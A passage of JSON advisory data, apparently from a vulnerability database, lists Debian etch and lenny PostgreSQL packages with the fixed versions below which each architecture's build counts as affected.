"OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "s390x", "packageFilename": "libecpg-dev_8.3.9-0lenny1_s390.deb", "packageName": "libecpg-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "hppa", "packageFilename": "libecpg-dev_8.3.9-0lenny1_hppa.deb", "packageName": "libecpg-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "hppa", "packageFilename": "libpgtypes2_8.1.19-0etch1_hppa.deb", "packageName": "libpgtypes2", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "s390x", "packageFilename": "libecpg-dev_8.1.19-0etch1_s390.deb", "packageName": "libecpg-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "i686", "packageFilename": "postgresql-client-8.3_8.3.9-0lenny1_i386.deb", "packageName": "postgresql-client-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "arm", "packageFilename": "postgresql-plpython-8.3_8.3.9-0lenny1_arm.deb", "packageName": "postgresql-plpython-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "mipsel", "packageFilename": "libecpg6_8.3.9-0lenny1_mipsel.deb", "packageName": "libecpg6", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "hppa", "packageFilename": "postgresql-plperl-7.4_7.4.27-0etch1_hppa.deb", "packageName": "postgresql-plperl-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "i686", "packageFilename": "libpq5_8.3.9-0lenny1_i386.deb", "packageName": "libpq5", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "ia64", "packageFilename": "libecpg6_8.3.9-0lenny1_ia64.deb", "packageName": "libecpg6", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "mipsel", "packageFilename": "postgresql-client-7.4_7.4.27-0etch1_mipsel.deb", "packageName": "postgresql-client-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "i686", "packageFilename": "libecpg5_8.1.19-0etch1_i386.deb", "packageName": "libecpg5", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "s390x", "packageFilename": "postgresql-contrib-7.4_7.4.27-0etch1_s390.deb", "packageName": "postgresql-contrib-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "mips", "packageFilename": "postgresql-client-8.1_8.1.19-0etch1_mips.deb", "packageName": "postgresql-client-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "sparc", "packageFilename": "postgresql-plpython-8.1_8.1.19-0etch1_sparc.deb", "packageName": "postgresql-plpython-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "ppc", "packageFilename": "postgresql-plperl-8.3_8.3.9-0lenny1_powerpc.deb", "packageName": "postgresql-plperl-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "ia64", "packageFilename": "postgresql-plpython-8.3_8.3.9-0lenny1_ia64.deb", "packageName": "postgresql-plpython-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "i686", "packageFilename": "postgresql-contrib-7.4_7.4.27-0etch1_i386.deb", "packageName": "postgresql-contrib-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "i686", "packageFilename": "postgresql-server-dev-8.3_8.3.9-0lenny1_i386.deb", "packageName": "postgresql-server-dev-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "ppc", "packageFilename": "libpq5_8.3.9-0lenny1_powerpc.deb", "packageName": "libpq5", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "i686", "packageFilename": "postgresql-pltcl-8.3_8.3.9-0lenny1_i386.deb", "packageName": "postgresql-pltcl-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "alpha", "packageFilename": "postgresql-contrib-7.4_7.4.27-0etch1_alpha.deb", "packageName": "postgresql-contrib-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "all", "packageFilename": "postgresql-doc-8.1_8.1.19-0etch1_all.deb", "packageName": "postgresql-doc-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "sparc", "packageFilename": "postgresql-plperl-8.3_8.3.9-0lenny1_sparc.deb", "packageName": "postgresql-plperl-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "sparc", "packageFilename": "postgresql-pltcl-8.1_8.1.19-0etch1_sparc.deb", "packageName": "postgresql-pltcl-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "ppc", "packageFilename": "libecpg-dev_8.3.9-0lenny1_powerpc.deb", "packageName": "libecpg-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "sparc", "packageFilename": "postgresql-plperl-8.1_8.1.19-0etch1_sparc.deb", "packageName": "postgresql-plperl-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "sparc", "packageFilename": "postgresql-server-dev-8.1_8.1.19-0etch1_sparc.deb", "packageName": "postgresql-server-dev-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "ppc", "packageFilename": "postgresql-contrib-8.3_8.3.9-0lenny1_powerpc.deb", "packageName": "postgresql-contrib-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "alpha", "packageFilename": "postgresql-plpython-8.3_8.3.9-0lenny1_alpha.deb", "packageName": "postgresql-plpython-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "arm", "packageFilename": "postgresql-plpython-7.4_7.4.27-0etch1_arm.deb", "packageName": "postgresql-plpython-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "sparc", "packageFilename": "postgresql-contrib-7.4_7.4.27-0etch1_sparc.deb", "packageName": "postgresql-contrib-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "ppc", "packageFilename": "postgresql-pltcl-8.1_8.1.19-0etch1_powerpc.deb", "packageName": "postgresql-pltcl-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1.diff", "arch": "src", "packageFilename": "postgresql-8.3_8.3.9-0lenny1.diff.gz", "packageName": "postgresql-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1.diff", "arch": "src", "packageFilename": "postgresql-8.1_8.1.19-0etch1.diff.gz", "packageName": "postgresql-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "mipsel", "packageFilename": "postgresql-plperl-7.4_7.4.27-0etch1_mipsel.deb", "packageName": "postgresql-plperl-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "arm", "packageFilename": "postgresql-pltcl-8.1_8.1.19-0etch1_arm.deb", "packageName": "postgresql-pltcl-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "i686", "packageFilename": "libpgtypes3_8.3.9-0lenny1_i386.deb", "packageName": "libpgtypes3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "s390x", "packageFilename": "postgresql-client-8.1_8.1.19-0etch1_s390.deb", "packageName": "postgresql-client-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "mipsel", "packageFilename": "postgresql-contrib-7.4_7.4.27-0etch1_mipsel.deb", "packageName": "postgresql-contrib-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "alpha", "packageFilename": "postgresql-pltcl-8.3_8.3.9-0lenny1_alpha.deb", "packageName": "postgresql-pltcl-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "ppc", "packageFilename": "libecpg-compat3_8.3.9-0lenny1_powerpc.deb", "packageName": "libecpg-compat3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "s390x", "packageFilename": "postgresql-contrib-8.1_8.1.19-0etch1_s390.deb", "packageName": "postgresql-contrib-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "s390x", "packageFilename": "postgresql-plpython-8.3_8.3.9-0lenny1_s390.deb", "packageName": "postgresql-plpython-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "mips", "packageFilename": "postgresql-contrib-8.1_8.1.19-0etch1_mips.deb", "packageName": "postgresql-contrib-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "arm", "packageFilename": "postgresql-pltcl-8.3_8.3.9-0lenny1_arm.deb", "packageName": "postgresql-pltcl-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "ia64", "packageFilename": "libpgtypes2_8.1.19-0etch1_ia64.deb", "packageName": "libpgtypes2", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "hppa", "packageFilename": "postgresql-pltcl-8.3_8.3.9-0lenny1_hppa.deb", "packageName": "postgresql-pltcl-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "ia64", "packageFilename": "postgresql-pltcl-8.3_8.3.9-0lenny1_ia64.deb", "packageName": "postgresql-pltcl-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "sparc", "packageFilename": "libpgtypes3_8.3.9-0lenny1_sparc.deb", "packageName": "libpgtypes3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "i686", "packageFilename": "postgresql-7.4_7.4.27-0etch1_i386.deb", "packageName": "postgresql-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "mipsel", "packageFilename": "postgresql-server-dev-8.3_8.3.9-0lenny1_mipsel.deb", "packageName": "postgresql-server-dev-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "s390x", "packageFilename": "postgresql-plpython-7.4_7.4.27-0etch1_s390.deb", "packageName": "postgresql-plpython-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "mipsel", "packageFilename": "postgresql-plpython-7.4_7.4.27-0etch1_mipsel.deb", "packageName": "postgresql-plpython-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "arm", "packageFilename": "postgresql-pltcl-7.4_7.4.27-0etch1_arm.deb", "packageName": "postgresql-pltcl-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "arm", "packageFilename": "libpq-dev_8.3.9-0lenny1_arm.deb", "packageName": "libpq-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "x86-64", "packageFilename": "libpgtypes3_8.3.9-0lenny1_amd64.deb", "packageName": "libpgtypes3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "sparc", "packageFilename": "postgresql-pltcl-7.4_7.4.27-0etch1_sparc.deb", "packageName": "postgresql-pltcl-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "ppc", "packageFilename": "postgresql-7.4_7.4.27-0etch1_powerpc.deb", "packageName": "postgresql-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "ia64", "packageFilename": "postgresql-contrib-7.4_7.4.27-0etch1_ia64.deb", "packageName": "postgresql-contrib-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "mipsel", "packageFilename": "postgresql-plperl-8.1_8.1.19-0etch1_mipsel.deb", "packageName": "postgresql-plperl-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "mips", "packageFilename": "libecpg-dev_8.3.9-0lenny1_mips.deb", "packageName": "libecpg-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "hppa", "packageFilename": "libecpg6_8.3.9-0lenny1_hppa.deb", "packageName": "libecpg6", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "ia64", "packageFilename": "libpq5_8.3.9-0lenny1_ia64.deb", "packageName": "libpq5", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "s390x", "packageFilename": "postgresql-7.4_7.4.27-0etch1_s390.deb", "packageName": "postgresql-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "arm", "packageFilename": "postgresql-contrib-8.1_8.1.19-0etch1_arm.deb", "packageName": "postgresql-contrib-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "hppa", "packageFilename": "libpq4_8.1.19-0etch1_hppa.deb", "packageName": "libpq4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "ppc", "packageFilename": "postgresql-plperl-8.1_8.1.19-0etch1_powerpc.deb", "packageName": "postgresql-plperl-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "i686", "packageFilename": "libecpg-compat2_8.1.19-0etch1_i386.deb", "packageName": "libecpg-compat2", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "alpha", "packageFilename": "libecpg-dev_8.1.19-0etch1_alpha.deb", "packageName": "libecpg-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "s390x", "packageFilename": "postgresql-pltcl-7.4_7.4.27-0etch1_s390.deb", "packageName": "postgresql-pltcl-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "ia64", "packageFilename": "libecpg-dev_8.1.19-0etch1_ia64.deb", "packageName": "libecpg-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "mips", "packageFilename": "postgresql-plperl-7.4_7.4.27-0etch1_mips.deb", "packageName": "postgresql-plperl-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "mips", "packageFilename": "libecpg-dev_8.1.19-0etch1_mips.deb", "packageName": "libecpg-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "ppc", "packageFilename": "postgresql-client-7.4_7.4.27-0etch1_powerpc.deb", "packageName": "postgresql-client-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "mipsel", "packageFilename": "libecpg-compat2_8.1.19-0etch1_mipsel.deb", "packageName": "libecpg-compat2", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "i686", "packageFilename": "postgresql-8.1_8.1.19-0etch1_i386.deb", "packageName": "postgresql-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "all", "packageFilename": "postgresql-contrib_8.3.9-0lenny1_all.deb", "packageName": "postgresql-contrib", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "mipsel", "packageFilename": "postgresql-8.3_8.3.9-0lenny1_mipsel.deb", "packageName": "postgresql-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "mips", "packageFilename": "postgresql-plpython-8.1_8.1.19-0etch1_mips.deb", "packageName": "postgresql-plpython-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "sparc", "packageFilename": "postgresql-client-7.4_7.4.27-0etch1_sparc.deb", "packageName": "postgresql-client-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "alpha", "packageFilename": "libecpg-compat3_8.3.9-0lenny1_alpha.deb", "packageName": "libecpg-compat3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "sparc", "packageFilename": "libecpg-compat2_8.1.19-0etch1_sparc.deb", "packageName": "libecpg-compat2", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "mips", "packageFilename": "postgresql-7.4_7.4.27-0etch1_mips.deb", "packageName": "postgresql-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "mipsel", "packageFilename": "postgresql-plperl-8.3_8.3.9-0lenny1_mipsel.deb", "packageName": "postgresql-plperl-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "all", "packageFilename": "postgresql-doc-7.4_7.4.27-0etch1_all.deb", "packageName": "postgresql-doc-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "arm", "packageFilename": "libecpg-compat2_8.1.19-0etch1_arm.deb", "packageName": "libecpg-compat2", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "armel", "packageFilename": "libecpg-compat3_8.3.9-0lenny1_armel.deb", "packageName": "libecpg-compat3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "i686", "packageFilename": "postgresql-plperl-7.4_7.4.27-0etch1_i386.deb", "packageName": "postgresql-plperl-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "x86-64", "packageFilename": "libecpg6_8.3.9-0lenny1_amd64.deb", "packageName": "libecpg6", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "all", "packageFilename": "postgresql-doc_8.3.9-0lenny1_all.deb", "packageName": "postgresql-doc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "mips", "packageFilename": "postgresql-contrib-7.4_7.4.27-0etch1_mips.deb", "packageName": "postgresql-contrib-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "s390x", "packageFilename": "postgresql-8.3_8.3.9-0lenny1_s390.deb", "packageName": "postgresql-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "hppa", "packageFilename": "postgresql-8.1_8.1.19-0etch1_hppa.deb", "packageName": "postgresql-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "sparc", "packageFilename": "libpgtypes2_8.1.19-0etch1_sparc.deb", "packageName": "libpgtypes2", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "arm", "packageFilename": "postgresql-7.4_7.4.27-0etch1_arm.deb", "packageName": "postgresql-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "ppc", "packageFilename": "libpq-dev_8.1.19-0etch1_powerpc.deb", "packageName": "libpq-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "ia64", "packageFilename": "postgresql-7.4_7.4.27-0etch1_ia64.deb", "packageName": "postgresql-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "arm", "packageFilename": "postgresql-client-8.3_8.3.9-0lenny1_arm.deb", "packageName": "postgresql-client-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "i686", "packageFilename": "libpq-dev_8.1.19-0etch1_i386.deb", "packageName": "libpq-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "armel", "packageFilename": "postgresql-pltcl-8.3_8.3.9-0lenny1_armel.deb", "packageName": "postgresql-pltcl-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "arm", "packageFilename": "postgresql-plperl-7.4_7.4.27-0etch1_arm.deb", "packageName": "postgresql-plperl-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "hppa", "packageFilename": "postgresql-8.3_8.3.9-0lenny1_hppa.deb", "packageName": "postgresql-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "i686", "packageFilename": "postgresql-plperl-8.3_8.3.9-0lenny1_i386.deb", "packageName": "postgresql-plperl-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "i686", "packageFilename": "postgresql-pltcl-7.4_7.4.27-0etch1_i386.deb", "packageName": "postgresql-pltcl-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "ia64", "packageFilename": "postgresql-8.1_8.1.19-0etch1_ia64.deb", "packageName": "postgresql-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "mipsel", "packageFilename": "postgresql-8.1_8.1.19-0etch1_mipsel.deb", "packageName": "postgresql-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "alpha", "packageFilename": "postgresql-pltcl-7.4_7.4.27-0etch1_alpha.deb", "packageName": "postgresql-pltcl-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "arm", "packageFilename": "libpgtypes2_8.1.19-0etch1_arm.deb", "packageName": "libpgtypes2", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "hppa", "packageFilename": "libecpg5_8.1.19-0etch1_hppa.deb", "packageName": "libecpg5", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "ppc", "packageFilename": "postgresql-client-8.1_8.1.19-0etch1_powerpc.deb", "packageName": "postgresql-client-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "mipsel", "packageFilename": "postgresql-client-8.3_8.3.9-0lenny1_mipsel.deb", "packageName": "postgresql-client-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "arm", "packageFilename": "postgresql-client-8.1_8.1.19-0etch1_arm.deb", "packageName": "postgresql-client-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "x86-64", "packageFilename": "libecpg-dev_8.3.9-0lenny1_amd64.deb", "packageName": "libecpg-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "arm", "packageFilename": "libpq4_8.1.19-0etch1_arm.deb", "packageName": "libpq4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "mipsel", "packageFilename": "postgresql-pltcl-8.1_8.1.19-0etch1_mipsel.deb", "packageName": "postgresql-pltcl-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "x86-64", "packageFilename": "postgresql-plperl-8.3_8.3.9-0lenny1_amd64.deb", "packageName": "postgresql-plperl-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "mips", "packageFilename": "postgresql-pltcl-7.4_7.4.27-0etch1_mips.deb", "packageName": "postgresql-pltcl-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "arm", "packageFilename": "postgresql-plperl-8.3_8.3.9-0lenny1_arm.deb", "packageName": "postgresql-plperl-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "ppc", "packageFilename": "libecpg-compat2_8.1.19-0etch1_powerpc.deb", "packageName": "libecpg-compat2", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "alpha", "packageFilename": "postgresql-client-8.3_8.3.9-0lenny1_alpha.deb", "packageName": "postgresql-client-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "s390x", "packageFilename": "postgresql-plpython-8.1_8.1.19-0etch1_s390.deb", "packageName": "postgresql-plpython-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "x86-64", "packageFilename": "postgresql-contrib-8.1_8.1.19-0etch1_amd64.deb", "packageName": "postgresql-contrib-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "sparc", "packageFilename": "postgresql-pltcl-8.3_8.3.9-0lenny1_sparc.deb", "packageName": "postgresql-pltcl-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "mips", "packageFilename": "libpgtypes3_8.3.9-0lenny1_mips.deb", "packageName": "libpgtypes3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "mips", "packageFilename": "libpq-dev_8.3.9-0lenny1_mips.deb", "packageName": "libpq-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "alpha", "packageFilename": 